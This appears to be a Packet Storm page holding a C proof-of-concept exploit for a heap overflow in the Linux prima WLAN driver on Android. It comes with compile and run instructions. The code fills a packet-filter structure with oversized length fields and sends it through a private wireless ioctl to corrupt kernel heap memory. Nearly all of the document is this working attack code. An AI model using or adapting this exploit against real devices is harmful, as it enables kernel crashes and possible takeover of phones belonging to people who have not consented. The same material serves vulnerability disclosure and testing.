The Linux prima WLAN driver suffers from a heap overflow vulnerability.
42f77c96c79b5f34870a10d56508b7bfe738f47704af55a41749f1fe7d3b3a57/*
* Coder: Shawn the R0ck, [citypw@gmail.com]
* Co-worker: Pray3r, [pray3r.z@gmail.com]
* Compile:
* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie
* # ./a.out wlan0
* Boom......shit happens[ as always];-)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>
typedef unsigned char v_U8_t;
#define HDD_MAX_CMP_PER_PACKET_FILTER 5
struct PacketFilterParamsCfg {
v_U8_t protocolLayer;
v_U8_t cmpFlag;
v_U8_t dataOffset;
v_U8_t dataLength;
v_U8_t compareData[8];
v_U8_t dataMask[8];
};
typedef struct {
v_U8_t filterAction;
v_U8_t filterId;
v_U8_t numParams;
struct PacketFilterParamsCfg
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;
int main(int argc, const char *argv[])
{
if (argc != 2) {
fprintf(stderr, "Bad usage\n");
fprintf(stderr, "Usage: %s ifname\n", argv[0]);
return -1;
}
struct iwreq req;
strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
int fd, status, i = 0;
fd = socket(AF_INET, SOCK_DGRAM, 0);
tPacketFilterCfg p_req;
/* crafting a data structure to triggering the code path */
req.u.data.pointer =
malloc(sizeof(v_U8_t) * 3 +
sizeof(struct PacketFilterParamsCfg) * 5);
p_req.filterAction = 1;
p_req.filterId = 0;
p_req.numParams = 3;
for (; i < 5; i++) {
p_req.paramsData[i].dataLength = 241;
memset(&p_req.paramsData[i].compareData, 0x41, 16);
}
memcpy(req.u.data.pointer, &p_req,
sizeof(v_U8_t) * 3 +
sizeof(struct PacketFilterParamsCfg) * 5);
if (ioctl(fd, 0x8bf7, &req) == -1) {
fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
argv[1], strerror(errno));
} else {
printf("You shouldn't see this msg...\n");
}
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed